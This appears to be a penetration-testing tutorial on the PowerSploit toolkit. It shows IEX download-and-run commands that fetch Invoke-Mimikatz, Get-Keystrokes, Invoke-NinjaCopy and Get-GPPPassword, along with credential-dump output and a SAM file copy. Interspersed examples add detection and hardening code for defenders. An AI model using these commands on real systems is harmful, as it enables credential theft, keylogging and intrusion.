PS C:\> Get-HttpStatus -Target search.yahoo.com -Path .\urls.txt
URL Status
--- ------
http://search.yahoo.com/index NotFound
http://search.yahoo.com/admin NotFound
http://search.yahoo.com/ NotFound
http://search.yahoo.com/main NotFound
http://search.yahoo.com/page NotFound
http://search.yahoo.com/images OK
If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests:
PS C:\> Get-HttpStatus -Target www.yahoo.com -UseSSL -Path .\urls.txt
URL Status
--- ------
https://www.yahoo.com/index NotFound
https://www.yahoo.com/admin NotFound
https://www.yahoo.com/ NotFound
https://www.yahoo.com/main NotFound
https://www.yahoo.com/page NotFound
https://www.yahoo.com/images OK
If the service is running on some other port, such as 8080 or 8000, use the “-Port” switch to specify it:
PS C:\> Get-HttpStatus -Target demo.com -Port -Path .\urls.txt
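From the web server's side, a Get-HttpStatus run looks like one client requesting a list of paths in quick succession, most of which answer 404 (compare the NotFound rows above). The Python below is an added example, not part of this article or of PowerSploit: it parses constructed Common Log Format access-log lines (the same layout the SimpleHTTPServer log earlier in this article uses, with addresses from the documentation ranges) and flags any client that produces at least four 404 responses inside a sliding 60-second window; the thresholds and the log format are assumptions to tune for your server.

```python
import re
from collections import defaultdict
from datetime import datetime

# Common Log Format: client, identity, user, [timestamp], "request", status, size.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample access log: one client walking a wordlist (index, admin,
# main, page, images, as in the Get-HttpStatus output above) and one ordinary
# visitor whose only miss is the browser's favicon request.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [12/Nov/2015:14:02:01 +0000] "GET /index HTTP/1.1" 404 -',
    '203.0.113.7 - - [12/Nov/2015:14:02:01 +0000] "GET /admin HTTP/1.1" 404 -',
    '203.0.113.7 - - [12/Nov/2015:14:02:02 +0000] "GET /main HTTP/1.1" 404 -',
    '203.0.113.7 - - [12/Nov/2015:14:02:02 +0000] "GET /page HTTP/1.1" 404 -',
    '203.0.113.7 - - [12/Nov/2015:14:02:03 +0000] "GET /images HTTP/1.1" 200 -',
    '198.51.100.20 - - [12/Nov/2015:14:02:05 +0000] "GET / HTTP/1.1" 200 -',
    '198.51.100.20 - - [12/Nov/2015:14:02:09 +0000] "GET /favicon.ico HTTP/1.1" 404 -',
]


def parse_clf_line(line):
    """Parse one access-log line; returns None for lines that do not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_dictionary_scans(lines, window_seconds=60, min_not_found=4):
    """Flag client IPs with >= min_not_found 404s inside any window_seconds span."""
    by_ip = defaultdict(list)
    for line in lines:
        entry = parse_clf_line(line)
        if entry is not None:
            by_ip[entry["ip"]].append(entry)
    alerts = []
    for ip, entries in by_ip.items():
        misses = sorted((e for e in entries if e["status"] == 404), key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(misses)):  # sliding window over the 404 timestamps
            while (misses[end]["ts"] - misses[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_not_found:
            alerts.append({
                "ip": ip,
                "max_not_found_in_window": best,
                "distinct_missing_paths": len({e["path"] for e in misses}),
                "total_requests": len(entries),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_dictionary_scans(SAMPLE_ACCESS_LOG):
        print(alert)
```

Because Get-HttpStatus works through its wordlist serially from a single address, the 404s cluster tightly, which is what the window catches; on a busy site raise `min_not_found` and compare the number of distinct missing paths against the 404 count, since a scanner never asks for the same missing path twice while a broken link on a real page is hit repeatedly.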
Invoke-Mimikatz
This cmdlet is a PowerShell port of the original Mimikatz project. The benefit of using it over the Mimikatz executable is that it stays in memory. It can be used to dump credentials, certificates, etc. from the local computer or from other computers in the domain.
It is one of the most useful PowerSploit tools in a penetration testing engagement.
We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Exfiltration/Invoke-Mimikatz.ps1")
PS C:\> Get-Help Invoke-Mimikatz
NAME
Invoke-Mimikatz
SYNOPSIS
This script leverages Mimikatz and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in mem
ory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows that has PowerShell
v2 or higher installed.
Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: [email protected]. Twi
tter @gentilkiwi
License: http://creativecommons.org/licenses/by//fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Version:
ReflectivePEInjection version:
Mimikatz version: alpha (//)
SYNTAX
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCreds]] [<CommonParameters>]
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCerts]] [<CommonParameters>]
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-Command] <String>] [<CommonParameters>]
DESCRIPTION
Reflectively loads Mimikatz in memory using PowerShell. Can be used to dump credentials without writing anythin
g to disk. Can be used for any
functionality provided with Mimikatz.
RELATED LINKS
Blog: http://clymb3r.wordpress.com/
Benjamin DELPY blog: http://blog.gentilkiwi.com
Github repo: https://github.com/clymb3r/PowerShell
mimikatz Github repo: https://github.com/gentilkiwi/mimikatz
Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be
-loaded-using-invoke-reflectivedllinjection-ps1/
REMARKS
To see the examples, type: "get-help Invoke-Mimikatz -examples".
For more information, type: "get-help Invoke-Mimikatz -detailed".
For technical information, type: "get-help Invoke-Mimikatz -full".
Dump credentials using: Invoke-Mimikatz -DumpCreds
PS C:\> Invoke-Mimikatz -DumpCreds
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : ; (:e)
Session : Interactive from
User Name : Administrator
Domain : REMOTING
SID : S-------
msv :
[] Primary
* Username : Administrator
* Domain : REMOTING
* LM : fdc5a70a13943d6273d1c29094e32430
.......
Get-Keystrokes
This cmdlet logs the keystrokes pressed on the victim machine, i.e. it works as a keylogger. All logged keystrokes are stored in a local file, by default in the temp directory or at a custom location.
We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using:
PS C:\Users\test\Desktop> Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
PS C:\Users\test\Desktop> Get-Help -Examples Get-Keystrokes
NAME
Get-Keystrokes
SYNOPSIS
Logs keys pressed, time and the active window.
PowerSploit Function: Get-Keystrokes
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE --------------------------
C:\PS>Get-Keystrokes -LogPath C:\key.log
-------------------------- EXAMPLE --------------------------
C:\PS>Get-Keystrokes -CollectionInterval
-------------------------- EXAMPLE --------------------------
C:\PS>Get-Keystrokes -PollingInterval
This cmdlet can be executed using the following command:
Get-Keystrokes -LogPath c:\users\Administrator\desktop\keylogger.txt
This script also supports “-CollectionInterval”, with which you can set the capture interval in minutes. Note that the key log is very detailed, containing the pressed key, username, application name and timestamp.
Invoke-NinjaCopy
This cmdlet is used to copy protected files which cannot be copied when the operating system is running.
We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Exfiltration/Invoke-NinjaCopy.ps1")
PS C:\> Get-Help Invoke-NinjaCopy
NAME
Invoke-NinjaCopy
SYNOPSIS
This script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This requires you are an administrator of the server. This allows you to bypass the following protections:
Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives
SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Windows has no clue)
Bypass DACL's, such as a DACL which only allows SYSTEM to open a file
If the LocalDestination param is specified, the file will be copied to the file path specified on the local server (the server the script is being run from).
If the RemoteDestination param is specified, the file will be copied to the file path specified on the remote server.
The script works by opening a read handle to the volume (which if logged, may stand out, but I don't think most people log this and other processes do it too).
The script then uses NTFS parsing code written by cyb70289 and posted to CodePlex to parse the NTFS structures. Since the NTFS parsing code is written in C++, I have compiled the code to a DLL and load it reflective in to PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see below for a link to the original script).
Script: Invoke-NinjaCopy.ps1
Author: Joe Bialek, Twitter: @JosephBialek
Contributors: This script has a byte array hardcoded, which contains a DLL wich parses NTFS. This NTFS parsing code was written by cyb70289 <[email protected]>
See the following link: http://www.codeproject.com/Articles//An-NTFS-Parser-Lib
The source code is also available with the distribution of this script.
License: GPLv3 or later
Required Dependencies: None
Optional Dependencies: None
Version:
ReflectivePEInjection version:
SYNTAX
Invoke-NinjaCopy [-Path] <String> [[-RemoteDestination] <String>] [[-ComputerName] <String[]>] [[-BufferSize] <UInt>] [<CommonParameters>]
Invoke-NinjaCopy [-Path] <String> [[-LocalDestination] <String>] [[-ComputerName] <String[]>] [[-BufferSize] <UInt3>] [<CommonParameters>]
DESCRIPTION
Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. This bypasses file DACL's, read handle locks, and SACL's. You must be an administrator to run the script. This can be used to read SYSTEM files which are normally locked, such as the NTDS.dit file or registry hives.
RELATED LINKS
Blog: http://clymb3r.wordpress.com/
Github repo: https://github.com/clymb3r/PowerShell
NTFS Parsing Code: http://www.codeproject.com/Articles//An-NTFS-Parser-Lib
Blog on reflective loading: http://clymb3r.wordpress.com////reflective-dll-injection-with-powershell/
REMARKS
To see the examples, type: "get-help Invoke-NinjaCopy -examples".
For more information, type: "get-help Invoke-NinjaCopy -detailed".
For technical information, type: "get-help Invoke-NinjaCopy -full".
Execute “Invoke-NinjaCopy” using the following command to copy the protected “SAM” file:
PS C:\> Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\Administrator\Desktop\SAM
PS C:\> dir C:\Users\Administrator\Desktop\SAM
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/8/2015 2:25 PM 262144 SAM
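The help text above is candid that the raw read handle on the volume “if logged, may stand out”. Sysmon records exactly that operation as Event ID 9 (RawAccessRead), with the process image and the device it opened. The following is an added example, not code from the post or from Invoke-NinjaCopy, that lists those events and flags any process not on a baseline allow list. It assumes Sysmon is installed with a RawAccessRead rule enabled, that the allow list is adjusted to your own environment, and that it runs from an elevated PowerShell.

```powershell
# Added example for this post, not code from Invoke-NinjaCopy: list processes
# that opened a raw read handle to a volume, the step the help text says
# "may stand out" if logged. Sysmon logs this as Event ID 9 (RawAccessRead).
# Assumes Sysmon with a RawAccessRead rule is installed; run elevated.

function Get-RawVolumeReads {
    param(
        [int]$Hours = 24,
        # Images expected to read raw volumes legitimately (defrag, VSS, backup
        # agents). Assumption: replace with your own baseline.
        [string[]]$AllowList = @(
            'C:\Windows\System32\defrag.exe',
            'C:\Windows\System32\vssvc.exe'
        )
    )
    $Filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 9
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $Filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Sysmon stores its fields as named <Data> elements in the event XML.
        $Xml  = [xml]$_.ToXml()
        $Data = @{}
        foreach ($d in $Xml.Event.EventData.Data) { $Data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Image     = $Data['Image']
            ProcessId = $Data['ProcessId']
            Device    = $Data['Device']      # e.g. \Device\HarddiskVolume2
            Allowed   = ($AllowList -contains $Data['Image'])
        }
    }
}

# A PowerShell host reading a raw volume is the pattern Invoke-NinjaCopy
# produces; surface every hit that is not on the allow list.
Get-RawVolumeReads -Hours 24 |
    Where-Object { -not $_.Allowed } |
    Format-Table Time, Image, ProcessId, Device -AutoSize
```

Because the script copies the hive by parsing the volume directly, file-level auditing on SAM or NTDS.dit never fires; the volume handle is the only artifact on the host, which is why this event is worth collecting even though the help text expects few people to log it.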
Get-GPPPassword
We can install the Exfiltration PowerShell script “Get-GPPPassword” in the same way and view its help:
PS C:\Users\test\Desktop> Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1')
PS C:\Users\test\Desktop> Get-Help -Examples Get-GPPPassword
NAME
Get-GPPPassword
SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE 1 --------------------------
PS C:\>Get-GPPPassword
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
NewName : [BLANK]
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
NewName : [BLANK]
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
-------------------------- EXAMPLE 2 --------------------------
PS C:\>Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!
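The help output above shows that the credential sits as a `cpassword` attribute in the Groups, Services, ScheduledTasks and DataSources preference files under SYSVOL. The following is an added example, not code from the post or from PowerSploit, that scans SYSVOL for every preference file still carrying such an attribute and reports the file and account, without decrypting anything, so the preference can be deleted and the account password rotated. It assumes a domain-joined host with read access to SYSVOL; the domain is taken from the environment unless `-Domain` is given.

```powershell
# Added example for this post, not code from PowerSploit: find every Group
# Policy Preferences XML in SYSVOL that still carries a cpassword attribute so
# the preference can be removed and the account's password rotated. Reports
# location and account only; nothing is decrypted.
# Assumption: domain-joined host with read access to SYSVOL.

function Find-GppCpassword {
    param(
        # Assumption: the current DNS domain; pass -Domain for another one.
        [string]$Domain = $env:USERDNSDOMAIN
    )
    $SysvolPolicies = "\\$Domain\SYSVOL\$Domain\Policies"
    # The six preference types that can store a credential.
    $Names = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml',
             'DataSources.xml', 'Drives.xml', 'Printers.xml'

    Get-ChildItem -Path $SysvolPolicies -Recurse -Include $Names -ErrorAction SilentlyContinue |
        ForEach-Object {
            $File = $_.FullName
            try { [xml]$Xml = Get-Content -Path $File -Raw } catch { return }
            # Each <Properties> element with a cpassword attribute is one
            # stored credential.
            foreach ($Props in $Xml.SelectNodes('//*[@cpassword]')) {
                # The account attribute name differs per preference type.
                $User = $Props.userName
                if (-not $User) { $User = $Props.accountName }   # Services.xml
                if (-not $User) { $User = $Props.runAs }         # ScheduledTasks.xml
                [pscustomobject]@{
                    File        = $File
                    Type        = $_.Name
                    UserName    = $User
                    HasPassword = -not [string]::IsNullOrEmpty($Props.cpassword)
                    Changed     = $Props.ParentNode.changed
                }
            }
        }
}

Find-GppCpassword | Format-Table -AutoSize
```

Removing the XML entries is only half the fix: anyone who could read SYSVOL may already hold the password, so every account listed should be rotated, and domain controllers should carry the update that stops the Group Policy editor from writing new `cpassword` values.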
How to run PowerSploit from cmd?
C:\Windows\system32>powershell -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.114:8080/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Dec 14 2015 18:03:07)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : ; (:d17a)
Session : Interactive from
User Name : test
Domain : lab
Logon Server : LAB
Logon Time : // :: AM
SID : S-------
msv :
[] Primary
* Username : test
* Domain : lab
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
[] CredentialKeys
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
tspkg :
* Username : test
* Domain : lab
* Password : password
wdigest :
* Username : test
* Domain : lab
* Password : password
kerberos :
* Username : test
* Domain : lab
* Password : (null)
ssp :
credman :
Authentication Id : ; (:d163)
Session : Interactive from
User Name : test
Domain : lab
Logon Server : LAB
Logon Time : // :: AM
SID : S-------
msv :
[] CredentialKeys
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
[] Primary
* Username : test
* Domain : lab
* NTLM : f7eaee8fb117ad06bdd830b7586c
* SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73
tspkg :
* Username : test
* Domain : lab
* Password : password
wdigest :
* Username : test
* Domain : lab
* Password : password
kerberos :
* Username : test
* Domain : lab
* Password : (null)
ssp :
credman :
Authentication Id : ; (:)
Session : Service from
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : // :: AM
SID : S---
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : ; (:)
Session : Service from
User Name : LAB$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // :: AM
SID : S---
msv :
tspkg :
wdigest :
* Username : LAB$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : lab$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : ; (:d43f)
Session : UndefinedLogonType from
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : // :: AM
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : ; (:)
Session : UndefinedLogonType from
User Name : LAB$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : // :: AM
SID : S---
msv :
tspkg :
wdigest :
* Username : LAB$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : lab$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
mimikatz(powershell) # exit
Bye!
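The `wdigest` and `tspkg` blocks in the output above carry the user's password in plaintext because LSASS kept it in memory, and the dump itself was possible because an ordinary administrator process could read LSASS. The following is an added example, not code from the post or from mimikatz, that audits the two registry settings behind that: WDigest `UseLogonCredential`, which controls the plaintext caching, and LSA `RunAsPPL`, which stops unsigned processes from opening LSASS. It assumes an elevated PowerShell; `-Fix` writes the hardened values, and `RunAsPPL` takes effect after a reboot.

```powershell
# Added example for this post, not code from mimikatz: audit the settings that
# decide whether the "wdigest ... * Password : password" lines above can occur.
# UseLogonCredential = 0 stops LSASS keeping the plaintext; RunAsPPL = 1 makes
# LSASS a protected process that unsigned code cannot read.
# Assumption: run elevated; -Fix applies both values (RunAsPPL needs a reboot).

function Get-LsassCredentialExposure {
    param([switch]$Fix)

    $WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $LsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    $WDigest  = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    $RunAsPPL = (Get-ItemProperty -Path $LsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL

    # Before Windows 8.1 / Server 2012 R2 (build 9600) an absent value means
    # plaintext caching is on; from 8.1 onward absent means off.
    $OsBuild = [Environment]::OSVersion.Version.Build
    $WDigestEffective =
        if ($null -eq $WDigest) {
            if ($OsBuild -lt 9600) { 'caching plaintext (default on this build)' }
            else                   { 'not caching (default on this build)' }
        }
        elseif ($WDigest -eq 1) { 'caching plaintext' }
        else                    { 'not caching' }

    if ($Fix) {
        if (-not (Test-Path $WDigestKey)) { New-Item -Path $WDigestKey -Force | Out-Null }
        Set-ItemProperty -Path $WDigestKey -Name UseLogonCredential -Value 0 -Type DWord
        Set-ItemProperty -Path $LsaKey -Name RunAsPPL -Value 1 -Type DWord
    }

    [pscustomobject]@{
        Build                     = $OsBuild
        WDigestUseLogonCredential = $WDigest
        WDigestEffective          = $WDigestEffective
        LsaRunAsPPL               = $RunAsPPL
        LsaProtected              = ($RunAsPPL -eq 1)
    }
}

Get-LsassCredentialExposure | Format-List
```

The output in this post comes from a 2015 lab build, which is why `wdigest` still yields the password; on a host where `WDigestEffective` reads “not caching” the same dump shows `(null)` there, and with LSA protection on, the `sekurlsa::logonpasswords` step fails before it reads anything.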
References
- https://github.com/PowerShellMafia/PowerSploit
- http://resources.infosecinstitute.com/powershell-toolkit-powersploit/
- http://colesec.inventedtheinternet.com/tag/metasploit/
- https://www.microsoft.com/en-us/download/details.aspx?id=42554
- https://msdn.microsoft.com/en-us/powershell/mt173057.aspx
- https://github.com/powershell/powershell